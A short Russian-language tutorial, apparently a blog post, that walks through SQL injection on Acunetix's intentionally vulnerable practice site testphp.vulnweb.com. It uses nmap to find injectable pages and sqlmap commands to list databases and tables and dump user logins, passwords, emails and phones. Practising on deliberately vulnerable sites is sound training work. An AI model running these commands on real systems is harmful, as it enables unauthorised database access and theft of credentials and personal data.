SQL - иньекция на примере сайта Acunetix

На сайте Acunetix есть уязвимости, специально оставленные для пентестеров. Заходим по адресу http://www.vulnweb.com/

Далее, выбираем  для атаки адрес http://testphp.vulnweb.com Но шоп добраться до конкретных уязвимых страниц запускаем утилиту nmap вот такой командой

nmap -sV -script=http-sql-injection www. testphp.vulnweb.com -p 80

Список уязвимых страниц получен и выбираем любой понравившийся адрес. Затем запускаем sqlmap командой

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=4'%20OR%20sqlspider" --dbs

Программулина предупредила о незаконных действиях и что разработчики не несут ответственности за  и её использование и начала работу.

2 базы в списке получены.

Шоп равковырять базу acuart, применим команду

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=4'%20OR%20sqlspider" -D acuart --tables

Утилита опять предупредила о незаконных действиях и сунула уязвимой странице пейлоад.)))

Нашлось интересное - users.

Вот его и попробуем пошшупать следующей командой.

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=4'%20OR%20sqlspider" -D acuart -T users --columns

 

И получаем список ишшо интереснее. В пункте uname, дожны найтись логины юзеров.

Команда sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=4'%20OR%20sqlspider" -D acuart -T users -C uname --dump нам их и покажет

Нашлось! Теперь вытащим пароли из pass такой командой

 sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=4'%20OR%20sqlspider" -D acuart -T users -C pass --dump

И пароль есть! Далее... команда по вытаскиванию мыл из email

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=4'%20OR%20sqlspider" -D acuart -T users -C email --dump

Мыльник выловлен. А следующая команда покажет телефоны, если они есть

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=4'%20OR%20sqlspider" -D acuart -T users -C phone --dump

Вот и весь взлом. На этом всё.